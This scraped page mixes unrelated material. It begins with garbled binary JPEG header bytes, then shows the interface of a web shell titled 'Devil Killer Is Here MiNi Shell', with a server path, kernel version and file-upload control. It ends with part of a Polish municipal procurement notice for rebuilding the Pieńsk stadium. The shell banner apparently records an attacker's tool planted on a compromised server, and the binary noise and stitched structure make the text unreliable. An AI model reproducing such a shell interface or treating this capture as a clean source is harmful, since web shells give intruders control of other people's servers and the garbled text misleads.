JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210525/0006301402-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00063014 z dnia 2021-05-25</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa stadionu miejskiego w Pieńsku etap-I </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PIEŃSK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821470</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bolesławiecka 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pieńsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-930</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">75 77 86 511-513</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">75 77 86 405</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">nowicki@piensk.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.piensk.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa stadionu miejskiego w Pieńsku etap-I </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5d132ddc-bc77-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00063014</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001735/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Przebudowa stadionu miejskiego w Pieńsku - etap I</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.piensk.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu<br/>komunikacja zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji<br/>elektronicznej. Komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia,<br/>wnioski, zawiadomienia oraz informacje przekazywane są w formie elektronicznej przy użyciu mini<br/>Portalu https://miniportal.uzp.gov.pl/, e PUAPu https://epuap.gov.pl/wps/portal oraz poczty<br/>elektronicznej, e-mail nowicki@piensk.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)Informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania<br/>korespondencji elektronicznej:Zamawiający wymaga, aby w tytule maila był podany nr sprawy, co<br/>ułatwi komunikację pomiędzy stronami postępowania. 2) Wszelką korespondencję związaną<br/>zniniejszym postępowaniem, należy przekazywać za pośrednictwem ePUAP lub pocztyelektronicznej<br/>na adres: nowicki@piensk.com.pl Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze<br/>do Zamawiającego przed upływem wymaganego terminu. 3) Wykonawca zamierzający wziąć udział w<br/>postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.Wykonawca<br/>posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku<br/>oraz do formularza do komunikacji.4) Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały wRegulaminie<br/>korzystania z miniPortalu dostępnym pod adresemhttps://miniportal.uzp.gov.pl/WarunkiUslugi.aspxoraz<br/>Regulaminie ePUAP.5) Wykonawca przystępującdo niniejszego postępowania o udzieleniezamówienia<br/>publicznego, akceptuje warunki korzystania zminiPortalu, określone w RegulaminieminiPortalu oraz<br/>zobowiązuje się korzystając z miniPortaluprzestrzegać postanowień tegoregulaminu.6) Maksymalny<br/>rozmiar plików przesyłanych zapośrednictwem dedykowanych formularzy do: złożenia i wycofania<br/>oferty oraz do komunikacji wynosi150 MB.7) Za datę przekazania oferty,oświadczenia, o którym mowa<br/>w art. 125 ust. 1 pzp,podmiotowych środków dowodowych,przedmiotowych środków dowodowych oraz<br/>innych informacji,oświadczeń lub dokumentów,przekazywanych w postępowaniu, przyjmuje się datę<br/>ich przekazania naePUAP.8) W postępowaniu o udzielenie zamówienia korespondencja elektroniczna<br/>(inna niż ofertaWykonawcy i załączniki do oferty)odbywa się elektronicznie za pośrednictwem<br/>dedykowanegoformularzadostępnego na ePUAP orazudostępnionego przez miniPortal (Formularz do<br/>komunikacji).Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. We wszelkiejkorespondencji związanej z niniejszympostępowaniem Zamawiający i Wykonawcy posługują<br/>sięnumerem ogłoszenia (BZP).9) Dokumentyelektroniczne, oświadczenia lub elektroniczne<br/>kopiedokumentów lub oświadczeń składane są przezWykonawcę za pośrednictwem Formularza<br/>dokomunikacji jako załączniki. Zamawiający dopuszczarównież możliwość składania<br/>dokumentówelektronicznych, oświadczeń lub elektronicznych kopiidokumentów lub oświadczeń za<br/>pomocą pocztyelektronicznej, na adres email: nowicki@piensk.com.pl Sposób sporządzenia<br/>dokumentówelektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi<br/>być zgody zwymaganiami określonymi w rozporządzeniu Prezesa RadyMinistrów z dnia 30 grudnia<br/>2020 r. wsprawie sposobu sporządzania i przekazywania informacji orazwymagań technicznych<br/>dladokumentów elektronicznych oraz środków komunikacji elektronicznej wpostępowaniu o<br/>udzieleniezamówienia publicznego lub konkursie)10) Zamawiający nie przewidujesposobu<br/>komunikowania się zWykonawcami w inny sposób niż przy użyciu środków komunikacjielektronicznej,<br/>wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 RozporządzeniaParlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osóbfizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takichdanych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, zwane dalej„RODO”)<br/>(Dz.U. UE. L. 119.1 z 04.05.2016) informuję, iż:1) Administratorem danych osobowych jestPani<br/>Agnieszka Demichowicz Z administratorem można się skontaktować poprzez adres<br/>email:iod@piensk.com.pl lubpisemnie na adres siedziby administratora;2) Administrator<br/>wyznaczyłinspektora ochrony danych, zktórym może się Pani/Pan skontaktować poprzez<br/>emailiod@piensk.com.pl Z inspektorem ochronydanych można się kontaktować we wszystkich<br/>sprawachdotyczących przetwarzania danychosobowych oraz korzystania z praw związanych z<br/>przetwarzaniemdanych;3) zgodnie z treścią art. 6ust. 1 lit. c RODO Pani/Pana dane osobowe<br/>przetwarzane będą wcelu realizacji procesu wyboruwykonawcy na podstawie prowadzonego<br/>postępowania o udzieleniezamówienia publicznego, anastępnie realizacji postanowień umownych<br/>związanych z wykonywanymzamówieniem;4) w związku zprzetwarzaniem Pani/Pana danych w celach<br/>wskazanych powyżej, daneosobowe mogą byćudostępniane innym odbiorcom lub kategoriom<br/>odbiorców danych osobowych, napodstawie przepisówprawa oraz zawartych umów powierzenia<br/>przetwarzania danych, jeżeli wymaganebyłoby to w celurealizacji postanowień umownych,5) w<br/>odniesieniu do Pani/Pana danych osobowychdecyzje nie będąpodejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;6)Pani/Pana dane osobowebędą przechowywane,<br/>zgodnie z art. 97 ust. 1 ustawy – Prawo zamówieńpublicznych przez okres 4 latod dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czastrwania umowy przekracza 4lata, okres<br/>przechowywania obejmuje cały czas trwania umowy;7) posiadaPani/Pan prawo do:a)dostępu do<br/>danych osobowych, na podstawie art. 15 RODO, przy czymadministrator może żądać odosoby, której<br/>dane dotyczą, wskazania dodatkowych informacji mającychna celu sprecyzowanieżądania, w<br/>szczególności podania nazwy lub daty postępowania o udzieleniezamówieniapublicznego;b)<br/>sprostowania lub uzupełnienia danych osobowych, na podstawie art. 16RODO, przyczym skorzystanie<br/>z niniejszego uprawnienia nie może skutkować zmianą wynikupostępowania oudzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresieniezgodnym z ustawą– Prawo zamówień<br/>publicznych;c) ograniczenia przetwarzania danychosobowych, na podstawie art.18 RODO, przy czym<br/>wystąpienie z żądaniem nie ograniczaprzetwarzania danych osobowych doczasu zakończenia<br/>postępowania o udzielenie zamówieniapublicznego;d) wniesienia skargi doPrezesa Urzędu Ochrony<br/>Danych Osobowych, gdy uzna Pani/Pan,że przetwarzanie danychosobowych narusza przepisy<br/>RODO;8) nie przysługuje Pani/Panu prawo do:a)usunięcia lubprzenoszenia danych osobowych,b)<br/>wniesienia sprzeciwu wobec przetwarzania danychosobowych;9)podanie danych osobowych jest konieczne w celu realizacji postępowania o udzielenie zamówienia publicznego oraz realizacji<br/>postanowień umownych. Niepodanie danych będzie skutkowałobrakiem możliwości rozpatrzenia oferty<br/>złożonej w postępowaniu oraz zawarcia umowy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ISM.03.271.PN.07.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 5778409,92 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane polegające na przebudowie stadionu miejskiego.<br/>Zakresem robót z podziałem na branże przedstawiono poniżej.1 BRANŻA BUDOWLANA1.1<br/>Prace przygotowawcze, rozbiórkowe.1.2 Roboty ziemne, wymiana gruntu, ułożenie<br/>geowłókniny1.3 Budowa areny lekkoatletycznej z terenami rozgrzewkowym. Montaż osprzętu<br/>lekkoatletycznego mocowanegow podłożu.1.4 Budowa sektora rzutów z nawierzchnią z trawy<br/>naturalnej.1.5 Dostawa i montaż wyposażenia boiska piłkarskiego.1.6 Nawierzchnie ciągów<br/>komunikacyjnych z kostki betonowej o grubości 6 oraz 8 cm.1.7 Obramowanie nawierzchni z<br/>kostki betonowej obrzeżami betonowymi i krawężnikami.1.8 Wykonanie palisady betonowej.1.9<br/>Wykonanie nawierzchni z trawy naturalnej z rolki, parkowej.1.10 Ogrodzenie terenu, ogrodzenie<br/>bieżni, balustrady ochronne.1.11 Budowa murów oporowych żelbetowych, budowa<br/>schodów.1.12 Wykonanie fundamentów pod trybuny zadaszone.2 BRANŻA INSTALACYJNA2.1<br/>Kanalizacja deszczowa2.2 Odwodnienie drenarskie2.3 Odwodnienie liniowe systemem<br/>korytek2.4 Instalacja zraszania płyty boiska piłkarskiego2.5 Przebudowa sieci wodociągowej3<br/>BRANŻA ELEKTRYCZNA3.1 Zasilanie projektowanych obiektów w energię elektryczną3.2<br/>Główna szafa rozdzielcza RG3.3 Rozdział energii elektrycznej3.3.1 Relacja R3 - R4, odcinek 25<br/>mb w kierunku od R4 do R3, linię zakończyć pętlo o dł. 5 mb3.3.2 Relacja RG - R53.3.3 Relacja<br/>RG- PZ3.3.4 Relacja RG- Pp13.3.5 Relacja RG- Pp23.4 Instalacja oświetlenia bieżni3.5 Szafki<br/>rozdzielcze lokalne3.5.1 Szafka R43.6 Instalacja sterująca zraszaczami murawy3.7 Rurarz na<br/>potrzeby instalacji teletechnicznych3.8 Montaż gniazd wtykowych w studniach3.9 Instalacje<br/>uziemień ochronnych i połączeń wyrównawczych na odcinku od R5 do lokalizacji słupa<br/>S13,uziemić fundamenty trybun oraz R4, odcinek PP1-S5, odcinek PP1-SB1/ST2, odcinek<br/>SB/ST2-PP1, odcinekPP2-RG </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45212000-6 - Roboty budowlane w zakresie budowy wypoczynkowych, sportowych, kulturalnych, hotelowych i restauracyjnych obiektów budowlanych</p> <p class="mb-0">45212210-1 - Roboty budowlane w zakresie jednofunkcyjnych ośrodków sportowych</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">45342000-6 - Wznoszenie ogrodzeń</p> <p class="mb-0">45351000-2 - Mechaniczne instalacje inżynieryjne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin usunięcia wad i usterek w okresie gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:<br/> 1) sytuacji ekonomicznej lub finansowej<br/>Warunek będzie uznany za spełniony, jeżeli Wykonawca przedłoży dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 3 000 000,00 zł (słownie złotych: trzy miliony 00/100)<br/>2) zdolności technicznej lub zawodowej:<br/> a) Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończone co najmniej jedną robotę budowlaną o wartości nie mniejszej niż 4 000 000,00 zł brutto, polegającą na budowie lub przebudowie jednego obiektu sportowego w którego zakres wchodziła: <br/> • budowa bieżni lekkoatletycznej z nawierzchnią syntetyczną typu SANDWICH z 4 torami na okrężnej i 6 torami na prostej sprinterskiej,<br/> • budowa w wewnętrznej części bieżni płyty piłkarskiej z trawy sianej naturalnej lub z rolki z warstwą wegetacyjną i warstwą osączającą zgodnie z normą DIN 18035-4,<br/> • wykonanie automatycznego systemu zraszania murawy oraz drenażu pod płytą boiska piłkarskiego odprowadzającego wody deszczowe do kanalizacji deszczowej,<br/> • wykonaniu instalacji wodno-kanalizacyjnej i elektrycznej.<br/> b) Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował przynajmniej jedną osobą lub osobami, które będą uczestniczyć <br/>w realizacji zamówienia posiadającymi uprawienia zgodnie z wymogami ustawy Prawo budowlane ( tekst jedn.: Dz.U. 2020r. Poz. 1333 ze zm.) do pełnienia samodzielnych funkcji technicznych w budownictwie tj. kierownika budowy do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej i kierowników robót branżowych instalacje sanitarne i elektryczne z uprawnieniami bez ograniczeń.<br/>W przypadku podmiotów zagranicznych posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej wymaga się od Wykonawcy, aby osoby te posiadały równoważne uprawnienia do w/w.<br/>Zamawiający uzna uprawnienia równoważne zdobyte na podstawie przepisów obowiązujących przed wejściem w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej ustawy– w oparciu o art. 104 ustawy z dnia 7 lipca 1994r. – Prawo budowlane (t.j. Dz. U. 2020 r. poz. 1333 ze zm.).<br/>Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji informacji<br/>oDziałalności Gospodarczej, w zakresie art.109 ust.1 pkt 4 ustawy, sporządzonych nie wcześniej niż<br/>3miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji.2)oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5) ustawy Pzp, o braku<br/>przynależności dotejsamej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencjiikonsumentów (t.j. Dz. U. z 2020 r. poz. 1076 ze zm.), z innym wykonawcą, który złożył<br/>odrębnąofertę,ofertę częściową lub wniosek o dopuszczenie 